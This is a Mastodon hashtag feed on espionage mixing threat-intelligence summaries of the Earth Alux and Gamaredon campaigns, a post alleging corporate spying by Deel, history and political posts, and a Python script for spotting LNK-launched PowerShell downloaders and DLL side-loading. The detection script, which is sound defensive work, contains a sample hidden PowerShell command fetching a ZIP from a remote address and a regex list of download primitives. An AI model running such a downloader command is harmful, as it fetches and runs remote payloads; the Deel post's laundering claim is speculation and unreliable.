masto.ai is one of the many independent Mastodon servers you can use to participate in the fediverse.
#espionage


The Espionage Toolkit: A Closer Look at its Advanced Techniques

Earth Alux, a China-linked APT group, is actively conducting cyberespionage attacks against key sectors in the APAC and Latin American regions. The group exploits vulnerable services in exposed servers to gain initial access and deploys web shells like GODZILLA. Their primary backdoor, VARGEIT, is used alongside COBEACON for various stages of attack. Earth Alux employs advanced techniques such as DLL side-loading, anti-API hooking, and execution guardrails. They utilize tools like RAILLOAD and RAILSETTER for persistence and evasion. The group's capabilities include system information collection, file manipulation, command execution, and tool injection via mspaint processes. Earth Alux targets industries such as government, technology, logistics, and manufacturing, demonstrating a strategic focus on high-value information across different sectors.

Pulse ID: 67ea7b3862f607c0d857f9d8
Pulse Link: otx.alienvault.com/pulse/67ea7
Pulse Author: AlienVault
Created: 2025-03-31 11:23:36

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#APAC #BackDoor #China

First payment for #Deel’s corporate espionage plot against Rippling was paid through a #Revolut account. Subsequent payments were made using crypto (ethereum), because the CEO of Deel believed (incorrectly) such payments would “leave no trace”.

When they got caught the CEO of Deel told the spy to destroy his electronic devices and offered to relocate them to #Dubai.

I would bet an enormous amount of money that any HR/payroll companies like Deel that engage in corporate espionage and offer to relocate people to Dubai are also laundering money for #Russia and/or Iran.

“In the land of the coins the man who makes it to Dubai is king.”

* Full affidavit: newcomer.co/api/v1/file/574f21
* Thread with some fun details: x.com/tbpn/status/190743755713

♟️The Cooler (1974) was a spy novel written by George Markstein, co-creator of 1960s surreal espionage series The Prisoner. It’s based on the real-life Inverlair Lodge, a ‘retirement home for spies’, which also inspired The Prisoner. It was long out of print but is now available again, with a striking cover - plumeriapics.co.uk/shop/ols/pr


❌ If you threaten the #media, you oppose free speech.

❌ If you attempt to erase #history, you oppose #truth.

❌ If you support white supremacy, you support #racism.

❌ If you oppose the Institute of #Peace, you support #war.

❌ If you oppose #immigrants and #refugees, you support #genocide.

❌ If you oppose appropriations, you oppose #Congress.

❌ If you oppose national security, you support #espionage.

Today in Labor History March 29, 1951: Julius and Ethel Rosenberg were convicted of conspiracy to commit espionage. They were executed at Sing Sing in 1953. The Rosenbergs’ sons, Michael and Robert Meeropol, were adopted by Abel Meeropol, the composer of “Strange Fruit” (made famous by Billie Holiday). The sons maintained their parents’ innocence. However, after the fall of the Soviet Union, decoded Soviet cables showed that their father had, in fact, collaborated, but that their mother was innocent. They continued to fight for their mother’s pardon, but Obama refused to grant it. The Rosenbergs’ sons were among the last students to attend the anarchist Modern School, in Lakewood, New Jersey, before it finally shut its doors in 1958.

The Modern School movement began in 1901, in Barcelona, Spain, when Francisco Ferrer opened his Escuela Moderna. It was one of the very first Spanish schools to be fully secular, co-educational, and open to all students, regardless of class. His ideas were so popular that 40 more Modern Schools opened in Barcelona in just a few years, while 80 other schools adopted his textbooks. In 1909, there were mass protests and a General Strike against Spanish intervention in Morocco. The state responded with a week of terror and repression, during which they slaughtered over 600 workers and falsely executed Ferrer as an instigator of the protests. His execution led to worldwide protests. Modern Schools started to pop up outside of Spain, inspired by his original Escuela Moderna, including 20 in the U.S.

For more on the Modern School movement, read my article: michaeldunnauthor.com/2022/04/

(talosintelligence.com) Gamaredon APT Targets Ukraine with Remcos Backdoor Using War-Themed Lures blog.talosintelligence.com/gam

Cisco Talos is tracking a campaign targeting Ukrainian users with malicious LNK files that deliver the Remcos backdoor. The campaign, attributed with medium confidence to the Gamaredon APT group, uses Russian-language lures related to troop movements in Ukraine. The attack chain involves LNK files that execute PowerShell code to download a ZIP file containing the Remcos backdoor, which is then executed through DLL side-loading techniques. The attackers use geo-fenced servers in Russia and Germany that restrict access to Ukrainian IP addresses. This represents a continuation of Gamaredon's targeting of Ukrainian entities, though their use of the commercial Remcos backdoor marks a shift from their typical custom tooling.

Cisco Talos Blog · Gamaredon campaign abuses LNK files to distribute Remcos backdoor: Cisco Talos is actively tracking an ongoing campaign, targeting users in Ukraine with malicious LNK files which run a PowerShell downloader since at least November 2024.
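Both threat-intel posts above (the OTX pulse on Earth Alux and the Talos write-up on Gamaredon) describe a PowerShell downloader launched from an LNK file and a payload started through DLL side-loading. The script below is an added example, not code from Talos, LevelBlue/OTX or either campaign's analysts: it runs two defender-side heuristics over Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) records. The field names follow Sysmon's schema; the choice of download primitives, the assumption that an LNK double-clicked from the desktop yields explorer.exe as the parent process, the list of trusted directories, and all sample events (including the 203.0.113.10 address) are constructed for the example.

```python
"""
Two heuristic detections, assumed for this example, over Sysmon-style event dicts:
  (1) lnk_powershell_downloader: explorer.exe -> powershell.exe/pwsh.exe whose command
      line contains a download primitive (the LNK -> PowerShell -> ZIP stage above).
  (2) dll_sideload: a process running outside the Windows/Program Files trees loads an
      unsigned DLL from its own directory (the classic side-loading layout).
"""
import re

# Assumed list of PowerShell download primitives worth flagging when the parent is explorer.exe.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
    r"DownloadFile|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)

# Assumed "trusted" install roots; DLLs loaded beside an EXE under these paths are not flagged.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _norm(path: str) -> str:
    """Lower-case and backslash-normalise a Windows path for comparison."""
    return path.replace("/", "\\").lower()


def _dirname(path: str) -> str:
    """Directory part of a normalised path, with a trailing backslash."""
    return _norm(path).rsplit("\\", 1)[0] + "\\"


def is_lnk_powershell_downloader(ev: dict) -> bool:
    """Event ID 1: PowerShell spawned by explorer.exe with a download primitive."""
    if ev.get("EventID") != 1:
        return False
    image = _norm(ev.get("Image", ""))
    parent = _norm(ev.get("ParentImage", ""))
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return False
    if not parent.endswith("\\explorer.exe"):
        return False
    return bool(DOWNLOAD_PRIMITIVES.search(ev.get("CommandLine", "")))


def is_dll_sideload(ev: dict) -> bool:
    """Event ID 7: unsigned DLL loaded from the process's own, untrusted directory."""
    if ev.get("EventID") != 7:
        return False
    image_dir = _dirname(ev.get("Image", ""))
    dll_dir = _dirname(ev.get("ImageLoaded", ""))
    if image_dir != dll_dir:
        return False
    if image_dir.startswith(TRUSTED_DIRS):
        return False
    # Sysmon records "Signed" as the strings "true"/"false".
    return ev.get("Signed", "false").lower() != "true"


RULES = (
    ("lnk_powershell_downloader", is_lnk_powershell_downloader),
    ("dll_sideload", is_dll_sideload),
)


def triage(events) -> list:
    """Return [{'rule': name, 'index': i}] for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        for name, check in RULES:
            if check(ev):
                hits.append({"rule": name, "index": i})
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # benign: an admin running a local script from the desktop
        "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Users\u\fix-printer.ps1",
    },
    {   # suspicious: LNK-style launch of a hidden PowerShell downloader
        "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -w hidden -c "iwr http://203.0.113.10/a.zip -OutFile $env:TEMP\a.zip"',
    },
    {   # benign: mspaint.exe loading a signed system DLL from System32
        "EventID": 7, "Image": r"C:\Windows\System32\mspaint.exe",
        "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true",
    },
    {   # suspicious: a copied EXE in %TEMP% loading an unsigned DLL beside itself
        "EventID": 7, "Image": r"C:\Users\u\AppData\Local\Temp\viewer.exe",
        "ImageLoaded": r"C:\Users\u\AppData\Local\Temp\version.dll", "Signed": "false",
    },
    {   # benign: vendor software loading its own unsigned helper from Program Files
        "EventID": 7, "Image": r"C:\Program Files\Vendor\app.exe",
        "ImageLoaded": r"C:\Program Files\Vendor\helper.dll", "Signed": "false",
    },
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['rule']}: event #{hit['index']}")
```

Run as-is the script reports two hits, the hidden downloader (event 1) and the %TEMP% side-load (event 3), and stays silent on the three benign records. The side-loading rule deliberately keys on the directory layout rather than on a DLL name list, since the binaries both groups abuse are legitimate signed executables copied next to a malicious DLL; tune TRUSTED_DIRS to your own software-deployment paths to keep false positives down.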